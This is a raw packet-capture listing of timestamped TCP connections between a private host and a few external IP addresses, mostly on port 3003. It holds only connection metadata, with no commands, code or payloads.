Jul 27, 2023 20:18:56.954523087 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.954574108 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954616070 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.954638004 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954679966 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954715967 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954740047 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.954781055 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954826117 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954868078 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954886913 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.954930067 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954978943 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954992056 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955048084 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955094099 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955115080 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955162048 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955214977 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955229998 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955275059 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955317974 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955342054 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955387115 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955426931 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955451965 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955499887 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955543041 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955564022 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955607891 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955648899 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955673933 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955718994 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955764055 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955786943 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955836058 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955881119 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.955904007 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955954075 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.955996037 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956020117 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956067085 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956110001 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956132889 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956177950 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956223965 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956243038 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956319094 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956372976 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956387043 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956432104 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956473112 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956487894 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956532955 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956579924 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956626892 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956645966 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956691980 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956746101 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956763029 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956806898 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956850052 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956872940 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956917048 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.956958055 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.956981897 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.957029104 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.957072973 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.957098007 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.957143068 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.957189083 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.957207918 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.957257986 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.957292080 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.957309961 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998092890 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998172045 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998222113 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998272896 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998315096 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998346090 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998387098 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998435974 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998483896 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998528004 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998549938 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998595953 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998641968 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998662949 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998708963 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998754025 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998776913 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998830080 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998850107 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998894930 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.998915911 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.998961926 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999007940 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999027014 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999074936 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999119997 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999139071 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999185085 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999228954 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999252081 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999296904 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999340057 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999361992 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999407053 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999450922 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999474049 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999519110 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999567032 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999589920 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999639034 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999672890 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999695063 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999742031 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999789000 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999825001 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999844074 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.999891043 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999937057 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.999990940 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000004053 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000051022 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000103951 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000117064 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000164032 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000217915 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000231981 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000307083 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000345945 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000365019 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000411034 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000458002 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000504017 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000525951 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000575066 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000618935 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000641108 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000686884 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000731945 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000752926 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000799894 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000833988 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000854015 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.000897884 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000945091 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.000989914 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.001009941 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.001055002 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.001097918 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.001118898 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.001166105 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.001199007 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.001215935 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.042843103 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.042920113 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.042984009 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043015003 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043065071 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043118000 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043132067 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043178082 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043226957 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043247938 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043294907 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043332100 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043353081 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043400049 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043448925 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043492079 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043521881 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043571949 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043618917 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043638945 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043684006 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043730974 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043751955 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043802977 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043848991 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043886900 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.043934107 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.043987989 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044033051 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044080973 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044126034 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044145107 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044188976 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044234991 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044256926 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044351101 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044400930 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044425011 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044472933 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044517040 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044539928 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044586897 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044634104 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044652939 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044698954 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044744015 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044763088 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044811010 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044856071 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044873953 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044917107 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.044960022 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.044980049 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045027018 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045072079 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045097113 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045142889 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045190096 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045208931 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045253992 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045299053 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045319080 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045370102 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045414925 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045435905 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045483112 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045517921 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045537949 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045583010 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045629025 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045674086 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045692921 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045737982 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045779943 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045800924 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045850039 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045895100 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.045916080 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.045962095 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046015024 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046027899 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046072006 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046123981 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046137094 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046181917 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046232939 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046246052 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046289921 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046331882 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046354055 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046401024 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046444893 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046464920 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046509027 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046559095 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046596050 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046627045 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046675920 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046715021 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046741962 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046787977 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046808004 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046859980 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046914101 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.046930075 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.046973944 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047018051 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047035933 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047081947 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047137022 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047149897 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047195911 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047247887 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047261000 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047307014 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047341108 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047359943 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047405005 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047452927 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047506094 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047518969 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047563076 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047607899 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047626019 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047672033 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047724009 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047736883 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047782898 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047827959 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.047849894 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047898054 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047945023 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.047980070 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.048010111 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048062086 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048077106 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.048120022 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048171043 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048185110 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.048230886 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048299074 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.048330069 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048377991 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048433065 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048446894 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.048495054 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048547029 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048559904 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.048605919 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048660040 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048674107 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.048719883 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048753977 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.048775911 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.087924957 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.088040113 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.088083982 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:57.088112116 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.148587942 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:57.447861910 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:57.464051008 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:57.464113951 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:57.549689054 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.565920115 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.566121101 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.566468954 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.566534042 CEST	49690	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:57.582597971 CEST	80	49690	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:57.582652092 CEST	80	49690	188.114.97.7	192.168.2.4
